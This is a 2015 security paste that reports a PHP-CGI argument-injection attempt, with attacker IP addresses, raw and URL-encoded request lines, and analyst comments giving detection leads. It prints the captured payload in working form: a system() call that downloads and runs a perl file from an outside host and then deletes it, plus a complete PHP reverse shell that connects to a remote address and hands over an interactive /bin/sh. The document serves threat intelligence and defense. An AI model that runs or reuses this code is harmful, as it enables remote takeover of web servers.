Neonprimetime

PHP Injection Attempt: 80.73.9.164 85.214.73.166

Mar 19th, 2015
  1. PHP Injection Attempt
  2. Reported by neonprimetime security
  3. http://neonprimetime.blogspot.com
  4.  
  5. *****
  6. 80.73.9.164
  7. 85.214.73.166
  8. 91.121.105.21
  9. 208.85.177.238
  10. hxxp://208.85.177.238/.x/hb/php07
  11. *****
  12.  
  13. POST /cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
  14.  
  15. ****
  16.  
  17. POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
  18.  
  // Analyst note: captured attack payload, preserved verbatim as evidence. Do not execute.
  // The first statement is the POST body. The request line above sets
  // auto_prepend_file=php://input, which makes PHP run the request body as code.
  // That body shells out to:
  //   - download a file from 208.85.177.238 to /tmp/.bash_h1s7,
  //   - run it with perl, passing 85.214.73.166 as its only argument,
  //   - delete it afterwards, so the file may already be gone at triage time.
  // Hunting leads: php-cgi / web-server processes spawning wget, perl or sh,
  // and short-lived dot-files under /tmp.
  19. <?php system("wget 208.85.177.238/.x/hb/php07 -O /tmp/.bash_h1s7;perl /tmp/.bash_h1s7 85.214.73.166;rm -rf /tmp/.bash_h1s7 &"); ?>set_time_limit(0);
  // Everything after the closing tag above is a separate PHP connect-back shell as it
  // appears in the paste; no second opening tag is shown.
  // $ip / $port: the remote endpoint the script connects out to (see fsockopen below).
  // NOTE(review): TCP 22 is normally SSH; presumably chosen to blend with permitted
  // egress. Confirm against firewall logs.
  20. $ip = '91.121.105.21';
  21. $port = 22;
  // Maximum number of bytes requested per fread() in the relay loop.
  22. $chunk_size = 1400;
  // Passed to stream_select() as the write and exception sets; both stay null.
  23. $write_a = null;
  24. $error_a = null;
  // Command handed to proc_open(): it unsets HISTFILE and HISTSIZE (so shell history is
  // not relied on as evidence), prints host, session and identity info (uname -a, w, id),
  // then starts an interactive /bin/sh.
  25. $shell = 'unset HISTFILE; unset HISTSIZE; uname -a; w; id; /bin/sh -i';
  // $daemon is set to 1 after a successful fork and setsid; $debug gates the trace messages.
  26. $daemon = 0;
  27. $debug = 0;
  // Daemonisation step. If the pcntl extension is available the script forks, the
  // parent exits with status 0 and the child calls posix_setsid() to start a new session.
  // Defender view: after this the surviving PHP process may no longer be a child of the
  // web server (inferred from the fork/exit pattern), so look for orphaned php processes.
  // The request line above passes -d disable_functions="" to clear any function
  // blocklist, so hardening that relies on disable_functions must also stop the
  // query string from reaching php-cgi as command-line options.
  // The leading and trailing "." characters are how the paste rendered the original
  // whitespace (presumably tabs); they are not part of the script.
  28. if (function_exists('pcntl_fork')) {
  29. .$pid = pcntl_fork();.
  30. .if ($pid == -1) {
  31. ..printit("ERROR: Can't fork");
  32. ..exit(1);
  33. .}
  // Non-zero $pid means this is the parent, which exits immediately.
  34. .if ($pid) {
  35. ..exit(0);
  36. .}
  37. .if (posix_setsid() == -1) {
  38. ..printit("Error: Can't setsid()");
  39. ..exit(1);
  40. .}
  41. .$daemon = 1;
  42. } else {
  // Without pcntl the script continues in the foreground of the request.
  43. .printit("WARNING: Failed to daemonise.");
  44. }
  // Moves to the filesystem root and clears the umask before connecting out.
  45. chdir("/");
  46. umask(0);
  // Outbound connection: plain TCP connect to $ip:$port with a 30 second timeout.
  // Network indicator: a web-server host initiating a connection to the address and
  // port configured at the top of the script. On failure the error is reported and
  // the script exits with status 1.
  47. $sock = fsockopen($ip, $port, $errno, $errstr, 30);
  48. if (!$sock) {
  49. .printit("$errstr ($errno)");
  50. .exit(1);
  51. }
  // Pipe layout for the child process: 0 = stdin (child reads), 1 = stdout and
  // 2 = stderr (child writes).
  52. $descriptorspec = array(
  53. 0 => array("pipe", "r"),
  54. 1 => array("pipe", "w"),
  55. 2 => array("pipe", "w")
  56. );
  // Spawns the command held in $shell. Host indicator: a shell process whose parent
  // is PHP running under the web server.
  57. $process = proc_open($shell, $descriptorspec, $pipes);
  58. if (!is_resource($process)) {
  59. .printit("ERROR: Can't spawn shell");
  60. .exit(1);
  61. }
  // All three pipes and the socket are switched to non-blocking mode for the
  // select-driven loop that follows.
  62. stream_set_blocking($pipes[0], 0);
  63. stream_set_blocking($pipes[1], 0);
  64. stream_set_blocking($pipes[2], 0);
  65. stream_set_blocking($sock, 0);
  // Relay loop: copies bytes between the remote socket and the child shell's pipes
  // until either side reaches end-of-file.
  // Forensic note: data is passed through fread()/fwrite() unchanged and the socket
  // was opened as plain TCP, so nothing visible here encrypts or encodes the session.
  // A packet capture of this connection should therefore show the commands and
  // their output in clear text.
  66. while (1) {
  67. .if (feof($sock)) {
  68. ..printit("ERROR: Shell connection terminated");
  69. ..break;
  70. .}
  71. .if (feof($pipes[1])) {
  72. ..printit("ERROR: Shell process terminated");
  73. ..break;
  74. .}
  // Waits with no timeout (null) until the socket or the shell's stdout/stderr is readable.
  75. .$read_a = array($sock, $pipes[1], $pipes[2]);
  76. .$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
  // Remote side -> shell stdin.
  77. .if (in_array($sock, $read_a)) {
  78. ..if ($debug) printit("SOCK READ");
  79. ..$input = fread($sock, $chunk_size);
  80. ..if ($debug) printit("SOCK: $input");
  81. ..fwrite($pipes[0], $input);
  82. .}
  // Shell stdout -> remote side.
  83. .if (in_array($pipes[1], $read_a)) {
  84. ..if ($debug) printit("STDOUT READ");
  85. ..$input = fread($pipes[1], $chunk_size);
  86. ..if ($debug) printit("STDOUT: $input");
  87. ..fwrite($sock, $input);
  88. .}
  // Shell stderr -> remote side.
  89. .if (in_array($pipes[2], $read_a)) {
  90. ..if ($debug) printit("STDERR READ");
  91. ..$input = fread($pipes[2], $chunk_size);
  92. ..if ($debug) printit("STDERR: $input");
  93. ..fwrite($sock, $input);
  94. .}
  95. }
  96.  
  // Teardown after the relay loop ends: closes the socket and the three pipes, then
  // reaps the child process with proc_close().
  97. fclose($sock);
  98. fclose($pipes[0]);
  99. fclose($pipes[1]);
  100. fclose($pipes[2]);
  101. proc_close($process);
  // printit(): prints $string followed by a line break unless $daemon is truthy.
  // The function reads $daemon without a "global" declaration, so inside the function
  // it is an unset local and the condition is always true: the messages are emitted
  // even after daemonising.
  // Detection value: the fixed strings passed to printit() elsewhere in this script
  // (e.g. "WARNING: Failed to daemonise.", "ERROR: Can't spawn shell") may therefore
  // appear in HTTP response bodies or captured output, and can be used as signatures.
  // The string literal spans two lines exactly as it appears in the paste.
  102. function printit ($string) {
  103. .if (!$daemon) {
  104. ..print "$string
  105. ";
  106. .}
  107. }
  // The script ends with exit status 1 once the relay loop and teardown have finished.
  108. exit(1);
  109. ?>